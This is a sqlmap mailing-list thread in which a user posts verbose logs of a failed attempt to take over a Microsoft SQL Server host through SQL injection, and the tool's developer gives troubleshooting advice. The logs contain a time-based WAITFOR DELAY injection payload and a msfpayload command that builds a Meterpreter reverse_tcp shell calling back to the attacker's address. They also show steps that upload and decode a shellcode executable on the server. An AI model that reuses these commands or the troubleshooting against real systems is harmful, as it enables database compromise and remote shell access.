Re: [sqlmap-users] Error with operating system takeover (meterpreter)
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Error with operating system takeover (meterpreter)
|
From: Miroslav S. <mir...@gm...> - 2015-07-02 08:41:43
|
In your case, 404 is indication that file has not been found in the expected place. Now I see that the temporary file path is not being "refreshed" by the --fresh-queries. Please rerun the whole case with the --flush-session Bye p.s. in your case sqlmap tried to upload the file to the trashy location because of previously retrieved faulty temp location On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...> wrote: > Hi, > Thanks for your reply. > > This time I tried with --fresh-queries without specific --techniques. > > why am I getting error "page not found (404)" again and again? Does it > indicate that file is being written but is deleted by Anti-Virus control or > something and that's why while calling the uploaded file 404 error is > appearing, Can this be the case ? Need your opinion and expertise. > > > Thanks > > > --start--- > > root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn > --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries > > > which payload do you want to use? > [1] Meterpreter (default) > [2] Shell > [3] VNC > > 1 > [11:12:52] [DEBUG] executing local command: > /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp > EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R | > /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o > "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX > [11:12:52] [INFO] creation in progress .................. done > [11:13:10] [DEBUG] the shellcode size is 308 bytes > [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft > SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe' > [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL > injection technique > [11:13:10] [INFO] using PowerShell to write the binary file content to > file 'D:\Program Files\Microsoft SQL > Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe' > [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program > Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt, > please wait.. > [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to > D:\Program Files\Microsoft SQL > Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1 > [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to > write the D:\Program Files\Microsoft SQL > Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait.. > [11:13:12] [WARNING] if you experience problems with non-ASCII identifier > names you are advised to rerun with '--tamper=charunicodeencode' > [11:13:12] [DEBUG] checking the length of the remote file D:\Program > Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe > [11:13:12] [INFO] retrieved: > [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds > [11:13:13] [WARNING] it looks like the file has not been written (usually > occurs if the DBMS process' user has no write privileges in the destination > path) > do you want to try to upload the file with the custom Visual Basic script > technique? [Y/n] y > [11:13:15] [INFO] using a custom visual basic script to write the binary > file content to file 'D:\Program Files\Microsoft SQL > Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait.. > [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program > Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, > please wait.. > [11:13:16] [CRITICAL] page not found (404) > [11:13:16] [WARNING] HTTP error codes detected during run: > 404 (Not Found) - 1 times > [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean > that some kind of protection is involved (e.g. WAF) > > [*] shutting down at 11:13:16 > > > --end--- > > > > > > > > > > > > > > > > > > > On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi. >> >> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi. >> That way you'll kill the possibility to get perfectly valid results with >> other techniques >> 2) In current state, you've got some "trashy" characters (because of >> combination of laggy connection and stacked SQLi), like: "D:/Program >> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use >> --fresh-queries in such situations (once per run where you expect resume of >> trashy chars) to force sqlmap to try to retrieve the problematic value once >> again. >> >> Bye >> >> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...> >> wrote: >> >>> Hi All, >>> >>> In first phase of our test we discovered Target URL is vulnerable and we >>> managed to retrieved lots of information such as --users, --dbs, some of >>> --tables and lots more. All this retrieval was very slow probably due to >>> time-based vulnerability; however tried through all (BEUSTQ) and found same >>> state. >>> >>> During an attempt after few days of our success we noticed some of the >>> parameter is not working and we are receiving errors like for instance >>> during requery for --users we received error "[09:39:23] [CRITICAL] unable >>> to retrieve the number of database users". During requery for -U sa >>> --passwords we received "unnable to retrieve the password hashes for the >>> database users (probably because the session user has no read privileges >>> over the relevant system database table)". >>> >>> We moved to OS takeover, initially get error for xp_cmdshell however >>> activated and confirmed using SQLNinja and moved on to get --os-shell, >>> executed some of commands like "hostname", "whoami" and successfully >>> retrieved its output. >>> >>> Now after few minutes we noted that we are not getting any output of any >>> command with message "No output". >>> >>> We moved to --os-pwn + --msf-path, But again with no success on >>> meterpreter or VNC. >>> received error "HTTP error codes detected during run: >>> 404 (Not Found) - 1 times" >>> >>> I'm attaching screen log, please help me with this if thr is any scope >>> available. >>> Thanks in Advance. >>> >>> >>> >>> -------screen logs start------- >>> >>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S >>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t >>> test_msf7 -v 2 >>> _ >>> ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150519} >>> |_ -| . | | | .'| . | >>> |___|_ |_|_|_|_|__,| _| >>> |_| |_| http://sqlmap.org >>> >>> [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> prior mutual consent is illegal. It is the end user's responsibility to >>> obey all applicable local, state and federal laws. Developers assume no >>> liability and are not responsible for any misuse or damage caused by this >>> program >>> >>> [*] starting at 10:03:33 >>> >>> mytarget_login >>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login' >>> [10:03:33] [DEBUG] not a valid WebScarab log data >>> [10:03:33] [DEBUG] cleaning up configuration parameters >>> test_msf7 >>> mytarget_login >>> /opt/metasploit/apps/pro/msf3 >>> [10:03:33] [INFO] setting file for logging HTTP traffic >>> [10:03:33] [DEBUG] setting the HTTP timeout >>> [10:03:33] [DEBUG] creating HTTP requests opener object >>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value >>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality >>> [10:03:33] [DEBUG] provided Metasploit Framework path >>> '/opt/metasploit/apps/pro/msf3' is valid >>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the >>> Cookie >>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com' >>> [10:03:33] [INFO] testing connection to the target URL >>> [10:03:48] [DEBUG] declared web page charset 'utf-8' >>> sqlmap got a 302 redirect to ' >>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to >>> follow? [Y/n] Y >>> redirect is a result of a POST request. Do you want to resend original >>> POST data to a new location? [Y/n] Y >>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] >>> Connection reset by peer') >>> [10:03:56] [DEBUG] heuristically checking if the target is protected by >>> some kind of WAF/IPS/IDS >>> sqlmap identified the following injection points with a total of 0 >>> HTTP(s) requests: >>> --- >>> Parameter: testNumber (POST) >>> Type: stacked queries >>> Title: Microsoft SQL Server/Sybase stacked queries >>> Payload: >>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333'; >>> WAITFOR DELAY '0:0:5'--&testPassword=3243 >>> Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- >>> --- >>> [10:03:56] [INFO] testing Microsoft SQL Server >>> [10:03:56] [INFO] confirming Microsoft SQL Server >>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server >>> back-end DBMS: Microsoft SQL Server 2008 >>> how do you want to establish the tunnel? >>> [1] TCP: Metasploit Framework (default) >>> [2] ICMP: icmpsh - ICMP tunneling >>> > 1 >>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL >>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory >>> [10:04:00] [INFO] testing if current user is DBA >>> [10:04:00] [DEBUG] creating a support table to write commands standard >>> output to >>> [10:04:00] [WARNING] time-based comparison requires larger statistical >>> model, please wait.............................. >>> [10:04:04] [WARNING] it is very important not to stress the network >>> adapter during usage of time-based payloads to prevent potential errors >>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable >>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds >>> [10:04:04] [WARNING] in case of continuous data retrieval problems you >>> are advised to try a switch '--no-cast' or switch '--hex' >>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output >>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode >>> which connection type do you want to use? >>> [1] Reverse TCP: Connect back from the database host to this machine >>> (default) >>> [2] Reverse TCP: Try to connect back from the database host to this >>> machine, on all ports example3ween the specified and 65535 >>> [3] Reverse HTTP: Connect back from the database host to this machine >>> tunnelling traffic over HTTP >>> [4] Reverse HTTPS: Connect back from the database host to this machine >>> tunnelling traffic over HTTPS >>> [5] Bind TCP: Listen on the database host for a connection >>> > 1 >>> what is the local address? [192.168.1.8] >>> which local port number do you want to use? [61371] >>> which payload do you want to use? >>> [1] Meterpreter (default) >>> [2] Shell >>> [3] VNC >>> > 1 >>> [10:04:17] [DEBUG] executing local command: >>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp >>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R | >>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o >>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX >>> [10:04:17] [INFO] creation in progress .................. done >>> [10:04:35] [DEBUG] the shellcode size is 308 bytes >>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft >>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe' >>> [10:04:35] [DEBUG] going to upload the binary file with stacked query >>> SQL injection technique >>> [10:04:35] [INFO] using PowerShell to write the binary file content to >>> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo >>> Ā\tmpsebykt.exe' >>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program >>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt, >>> please wait.. >>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to >>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo >>> Ā\tmppsbcbi.ps1 >>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to >>> write the D:\Program Files\Microsoft SQL >>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait.. >>> [10:04:37] [WARNING] if you experience problems with non-ASCII >>> identifier names you are advised to rerun with '--tamper=charunicodeencode' >>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program >>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe >>> [10:04:37] [INFO] retrieved: >>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds >>> [10:04:37] [WARNING] it looks like the file has not been written >>> (usually occurs if the DBMS process' user has no write privileges in the >>> destination path) >>> do you want to try to upload the file with the custom Visual Basic >>> script technique? [Y/n] Y >>> [10:04:41] [INFO] using a custom visual basic script to write the binary >>> file content to file 'D:\Program Files\Microsoft SQL >>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait.. >>> [10:04:41] [DEBUG] uploading the file base64-encoded content to >>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo >>> Ā\tmpfegab.txt, please wait.. >>> [10:04:41] [CRITICAL] page not found (404) >>> [10:04:41] [WARNING] HTTP error codes detected during run: >>> 404 (Not Found) - 1 times >>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean >>> that some kind of protection is involved (e.g. WAF) >>> >>> [*] shutting down at 10:04:41 >>> >>> root@kali:~# >>> >>> >>> -------screen logs end------- >>> >>> >>> Please help!! >>> >>> >>> >>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> Don't Limit Your Business. Reach for the Cloud. >>> GigeNET's Cloud Solutions provide you with the tools and support that >>> you need to offload your IT needs and focus on growing your business. >>> Configured For All Businesses. Start Your Cloud Today. >>> https://www.gigenetcloud.com/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > -- Miroslav Stampar http://about.me/stamparm |
